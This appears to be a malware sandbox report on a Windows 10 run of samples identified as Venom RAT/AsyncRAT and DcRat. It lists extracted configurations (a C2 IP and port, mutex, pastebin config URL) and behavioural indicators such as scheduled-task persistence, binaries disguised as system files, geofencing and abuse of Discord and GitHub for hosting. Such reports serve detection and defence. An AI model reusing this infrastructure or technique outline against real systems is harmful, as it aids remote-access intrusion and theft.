Analysis
-
max time kernel
54s -
max time network
84s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-01-2025 21:57
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
bwvregfuduofklr
-
delay
0
-
install
true
-
install_file
jusched.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/7SdWk380
Extracted
asyncrat
1.0.7
Default
193.161.193.99:37161
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
DcRat 44 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 1564 schtasks.exe 3624 schtasks.exe 3464 schtasks.exe 2456 schtasks.exe 4500 schtasks.exe 320 schtasks.exe 2528 schtasks.exe 64 schtasks.exe 1716 schtasks.exe 2080 schtasks.exe 1432 schtasks.exe 4368 schtasks.exe 3624 schtasks.exe 628 schtasks.exe 6488 schtasks.exe 3948 schtasks.exe 2632 schtasks.exe 4264 schtasks.exe 5032 schtasks.exe 3156 schtasks.exe 1412 schtasks.exe 2632 schtasks.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection msedge.exe 2808 schtasks.exe 4208 schtasks.exe 2808 schtasks.exe 2184 schtasks.exe 5676 schtasks.exe 2456 schtasks.exe 624 schtasks.exe 4656 schtasks.exe 4496 schtasks.exe 4208 schtasks.exe 4448 schtasks.exe 964 schtasks.exe 3332 schtasks.exe 1844 schtasks.exe 1320 schtasks.exe 6592 schtasks.exe 1432 schtasks.exe 316 schtasks.exe 2604 schtasks.exe 3856 schtasks.exe 3344 schtasks.exe -
Dcrat family
-
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4496 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 320 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4208 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 316 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2808 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1432 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 64 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1844 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2528 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2604 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1432 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4208 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2808 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1716 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2080 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3948 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4368 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2184 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3464 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3624 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2632 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3156 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1320 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4448 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 964 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2456 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1412 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3856 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2632 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1564 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3344 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4264 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4500 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 628 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2456 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3624 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 624 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5032 2644 schtasks.exe 103 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4656 2644 schtasks.exe 103 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1236 created 612 1236 powershell.EXE 5 PID 3096 created 2184 3096 svchost.exe 130 -
resource yara_rule behavioral1/files/0x0009000000023d86-1331.dat dcrat behavioral1/memory/5068-1365-0x00000000006F0000-0x000000000081C000-memory.dmp dcrat behavioral1/files/0x0008000000023e4a-2451.dat dcrat behavioral1/files/0x0007000000023eb9-2958.dat dcrat -
pid Process 1236 powershell.EXE 4488 powershell.EXE 5844 powershell.exe 5804 powershell.exe 5664 powershell.exe 4724 powershell.exe 5912 powershell.exe 5812 powershell.exe 5644 powershell.exe 5712 powershell.exe 5888 powershell.exe 1472 powershell.exe 6088 powershell.exe 5972 powershell.exe 5832 powershell.exe 5128 powershell.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4100 attrib.exe 724 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 5068 webhostdll.exe 2528 jusched.exe -
Loads dropped DLL 58 IoCs
pid Process 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe 4332 main.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 33 IoCs
flow ioc 81 raw.githubusercontent.com 82 pastebin.com 99 raw.githubusercontent.com 131 discord.com 135 discord.com 144 discord.com 146 discord.com 151 discord.com 162 discord.com 129 discord.com 134 discord.com 98 discord.com 138 discord.com 153 discord.com 157 discord.com 164 discord.com 76 discord.com 133 discord.com 150 discord.com 160 discord.com 130 discord.com 152 discord.com 156 discord.com 158 discord.com 161 discord.com 159 discord.com 77 discord.com 80 raw.githubusercontent.com 83 pastebin.com 117 discord.com 126 discord.com 145 discord.com 148 discord.com -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 88 api.ipify.org 112 ip-api.com 122 ipapi.co 123 ipapi.co 140 ipapi.co 87 api.ipify.org -
Drops file in System32 directory 26 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\WmiPrvSEW svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\IdleI svchost.exe File opened for modification C:\Windows\System32\Tasks\explorere svchost.exe File opened for modification C:\Windows\System32\Tasks\OfficeClickToRunO svchost.exe File opened for modification C:\Windows\System32\Tasks\sihosts svchost.exe File opened for modification C:\Windows\System32\Tasks\sihost svchost.exe File opened for modification C:\Windows\System32\Tasks\dllhost svchost.exe File opened for modification C:\Windows\System32\Tasks\conhostc svchost.exe File opened for modification C:\Windows\System32\Tasks\conhost svchost.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\explorer svchost.exe File opened for modification C:\Windows\System32\Tasks\csrssc svchost.exe File opened for modification C:\Windows\System32\Tasks\csrss svchost.exe File opened for modification C:\Windows\System32\Tasks\Idle svchost.exe File opened for modification C:\Windows\System32\Tasks\webhostdllw svchost.exe File opened for modification C:\Windows\System32\Tasks\OfficeClickToRun svchost.exe File opened for modification C:\Windows\System32\Tasks\WmiPrvSE svchost.exe File opened for modification C:\Windows\System32\Tasks\RuntimeBrokerR svchost.exe File opened for modification C:\Windows\System32\Tasks\RuntimeBroker svchost.exe File opened for modification C:\Windows\System32\Tasks\MoUsoCoreWorker svchost.exe File opened for modification C:\Windows\System32\Tasks\webhostdll svchost.exe File opened for modification C:\Windows\System32\Tasks\dllhostd svchost.exe File opened for modification C:\Windows\System32\Tasks\jusched svchost.exe File opened for modification C:\Windows\System32\Tasks\MoUsoCoreWorkerM svchost.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 5176 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1236 set thread context of 908 1236 powershell.EXE 123 -
resource yara_rule behavioral1/files/0x0007000000023e10-2184.dat upx behavioral1/memory/4332-2194-0x00007FFA106C0000-0x00007FFA10B2E000-memory.dmp upx behavioral1/files/0x0007000000023e05-2222.dat upx behavioral1/files/0x0007000000023ded-2216.dat upx behavioral1/files/0x0007000000023e13-2237.dat upx behavioral1/files/0x0007000000023df5-2235.dat upx behavioral1/memory/4332-2273-0x00007FFA12500000-0x00007FFA125BC000-memory.dmp upx behavioral1/memory/4332-2272-0x00007FFA125C0000-0x00007FFA125ED000-memory.dmp upx behavioral1/memory/4332-2271-0x00007FFA23550000-0x00007FFA23569000-memory.dmp upx behavioral1/memory/4332-2270-0x00007FFA125F0000-0x00007FFA1261E000-memory.dmp upx behavioral1/files/0x0007000000023df4-2310.dat upx behavioral1/files/0x0007000000023e0e-2308.dat upx behavioral1/files/0x0007000000023e16-2306.dat upx behavioral1/files/0x0007000000023e11-2267.dat upx behavioral1/memory/4332-2315-0x00007FFA239D0000-0x00007FFA239DD000-memory.dmp upx behavioral1/memory/4332-2314-0x00007FFA12490000-0x00007FFA124C4000-memory.dmp upx behavioral1/memory/4332-2313-0x00007FFA124D0000-0x00007FFA124FB000-memory.dmp upx behavioral1/files/0x0007000000023df1-2263.dat upx behavioral1/files/0x0007000000023deb-2259.dat upx behavioral1/files/0x0007000000023e12-2245.dat upx behavioral1/memory/4332-2242-0x00007FFA23DD0000-0x00007FFA23DDD000-memory.dmp upx behavioral1/memory/4332-2241-0x00007FFA241C0000-0x00007FFA241D9000-memory.dmp upx behavioral1/memory/4332-2240-0x00007FFA242C0000-0x00007FFA242CF000-memory.dmp upx behavioral1/memory/4332-2239-0x00007FFA14970000-0x00007FFA14994000-memory.dmp upx behavioral1/memory/4332-2412-0x00007FFA123E0000-0x00007FFA12422000-memory.dmp upx behavioral1/memory/4332-2413-0x00007FFA1EFB0000-0x00007FFA1EFBA000-memory.dmp upx behavioral1/memory/4332-2414-0x00007FFA13960000-0x00007FFA1397C000-memory.dmp upx behavioral1/memory/4332-2416-0x00007FFA10EF0000-0x00007FFA10F1E000-memory.dmp upx behavioral1/memory/4332-2418-0x00007FFA0CA10000-0x00007FFA0CAC8000-memory.dmp upx behavioral1/memory/4332-2420-0x00007FFA0C690000-0x00007FFA0CA05000-memory.dmp upx behavioral1/memory/4332-2417-0x00007FFA14970000-0x00007FFA14994000-memory.dmp upx behavioral1/memory/4332-2415-0x00007FFA106C0000-0x00007FFA10B2E000-memory.dmp upx behavioral1/memory/4332-2436-0x00007FFA10EC0000-0x00007FFA10EE6000-memory.dmp upx behavioral1/memory/4332-2435-0x00007FFA1DD40000-0x00007FFA1DD4B000-memory.dmp upx behavioral1/memory/4332-2437-0x00007FFA0C570000-0x00007FFA0C688000-memory.dmp upx behavioral1/memory/4332-2434-0x00007FFA123C0000-0x00007FFA123D4000-memory.dmp upx behavioral1/memory/4332-2433-0x00007FFA12500000-0x00007FFA125BC000-memory.dmp upx behavioral1/memory/4332-2432-0x00007FFA125F0000-0x00007FFA1261E000-memory.dmp upx behavioral1/memory/4332-2438-0x00007FFA12110000-0x00007FFA1212F000-memory.dmp upx behavioral1/memory/4332-2439-0x00007FFA0BC60000-0x00007FFA0BDD1000-memory.dmp upx behavioral1/memory/4332-2455-0x00007FFA1A4D0000-0x00007FFA1A4DB000-memory.dmp upx behavioral1/memory/4332-2477-0x00007FFA106A0000-0x00007FFA106AD000-memory.dmp upx behavioral1/memory/4332-2486-0x00007FFA0D320000-0x00007FFA0D32B000-memory.dmp upx behavioral1/memory/4332-2488-0x00007FFA0C560000-0x00007FFA0C56D000-memory.dmp upx behavioral1/memory/4332-2502-0x00007FFA0C3C0000-0x00007FFA0C409000-memory.dmp upx behavioral1/memory/4332-2498-0x00007FFA0C410000-0x00007FFA0C429000-memory.dmp upx behavioral1/memory/4332-2497-0x00007FFA0C430000-0x00007FFA0C452000-memory.dmp upx behavioral1/memory/4332-2496-0x00007FFA0BC60000-0x00007FFA0BDD1000-memory.dmp upx behavioral1/memory/4332-2501-0x00007FFA0C270000-0x00007FFA0C28C000-memory.dmp upx behavioral1/memory/4332-2500-0x00007FFA0C3A0000-0x00007FFA0C3B1000-memory.dmp upx behavioral1/memory/4332-2499-0x00007FFA0C4C0000-0x00007FFA0C4D7000-memory.dmp upx behavioral1/memory/4332-2495-0x00007FFA0C4E0000-0x00007FFA0C4F4000-memory.dmp upx behavioral1/memory/4332-2494-0x00007FFA12110000-0x00007FFA1212F000-memory.dmp upx behavioral1/memory/4332-2493-0x00007FFA0C500000-0x00007FFA0C510000-memory.dmp upx behavioral1/memory/4332-2492-0x00007FFA0C570000-0x00007FFA0C688000-memory.dmp upx behavioral1/memory/4332-2491-0x00007FFA0C510000-0x00007FFA0C525000-memory.dmp upx behavioral1/memory/4332-2490-0x00007FFA0C530000-0x00007FFA0C53C000-memory.dmp upx behavioral1/memory/4332-2489-0x00007FFA0C540000-0x00007FFA0C552000-memory.dmp upx behavioral1/memory/4332-2487-0x00007FFA10EC0000-0x00007FFA10EE6000-memory.dmp upx behavioral1/memory/4332-2485-0x00007FFA0D300000-0x00007FFA0D30C000-memory.dmp upx behavioral1/memory/4332-2484-0x00007FFA0D310000-0x00007FFA0D31C000-memory.dmp upx behavioral1/memory/4332-2483-0x00007FFA0D3D0000-0x00007FFA0D3DB000-memory.dmp upx behavioral1/memory/4332-2482-0x00007FFA0C690000-0x00007FFA0CA05000-memory.dmp upx behavioral1/memory/4332-2481-0x00007FFA10690000-0x00007FFA1069E000-memory.dmp upx -
Drops file in Program Files directory 16 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe webhostdll.exe File created C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe webhostdll.exe File created C:\Program Files\Common Files\DESIGNER\csrss.exe webhostdll.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\RCX8782.tmp webhostdll.exe File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\RCX89B5.tmp webhostdll.exe File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe webhostdll.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\7a0fd90576e088 webhostdll.exe File created C:\Program Files (x86)\Windows Multimedia Platform\95d75016aa282d webhostdll.exe File created C:\Program Files\MSBuild\Microsoft\dllhost.exe webhostdll.exe File created C:\Program Files\Crashpad\reports\RuntimeBroker.exe webhostdll.exe File created C:\Program Files\Common Files\DESIGNER\886983d96e3d3e webhostdll.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe webhostdll.exe File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\RCX89B6.tmp webhostdll.exe File created C:\Program Files\MSBuild\Microsoft\5940a34987c991 webhostdll.exe File created C:\Program Files\Crashpad\reports\9e8d7a4ca61bd9 webhostdll.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\RCX8781.tmp webhostdll.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\servicing\Sessions\TiWorker.exe webhostdll.exe File created C:\Windows\Performance\WinSAT\DataStore\RuntimeBroker.exe webhostdll.exe File opened for modification C:\Windows\Migration\WTR\RCX8191.tmp webhostdll.exe File created C:\Windows\TAPI\66fc9ff0ee96c2 webhostdll.exe File opened for modification C:\Windows\Migration\WTR\Idle.exe webhostdll.exe File created C:\Windows\Migration\WTR\6ccacd8608530f webhostdll.exe File created C:\Windows\TAPI\sihost.exe webhostdll.exe File created C:\Windows\Performance\WinSAT\DataStore\9e8d7a4ca61bd9 webhostdll.exe File opened for modification C:\Windows\Migration\WTR\RCX81A2.tmp webhostdll.exe File created C:\Windows\Migration\WTR\Idle.exe webhostdll.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Xsploit Inject Fix.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1712 timeout.exe 5924 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings Xsploit Inject Fix.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 43 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4496 schtasks.exe 4208 schtasks.exe 2808 schtasks.exe 4368 schtasks.exe 1320 schtasks.exe 624 schtasks.exe 2632 schtasks.exe 3156 schtasks.exe 2456 schtasks.exe 3624 schtasks.exe 1716 schtasks.exe 1412 schtasks.exe 628 schtasks.exe 2808 schtasks.exe 3464 schtasks.exe 964 schtasks.exe 3856 schtasks.exe 1564 schtasks.exe 4264 schtasks.exe 5032 schtasks.exe 4208 schtasks.exe 316 schtasks.exe 64 schtasks.exe 2528 schtasks.exe 4448 schtasks.exe 2456 schtasks.exe 2632 schtasks.exe 1844 schtasks.exe 2604 schtasks.exe 2080 schtasks.exe 3624 schtasks.exe 6592 schtasks.exe 5676 schtasks.exe 2184 schtasks.exe 3344 schtasks.exe 6488 schtasks.exe 320 schtasks.exe 1432 schtasks.exe 1432 schtasks.exe 3948 schtasks.exe 3332 schtasks.exe 4500 schtasks.exe 4656 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2952 msedge.exe 2952 msedge.exe 3120 msedge.exe 3120 msedge.exe 3096 identity_helper.exe 3096 identity_helper.exe 1972 msedge.exe 1972 msedge.exe 1236 powershell.EXE 1236 powershell.EXE 1236 powershell.EXE 1236 powershell.EXE 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 908 dllhost.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 908 dllhost.exe 908 dllhost.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe 4724 $77XD.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3144 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
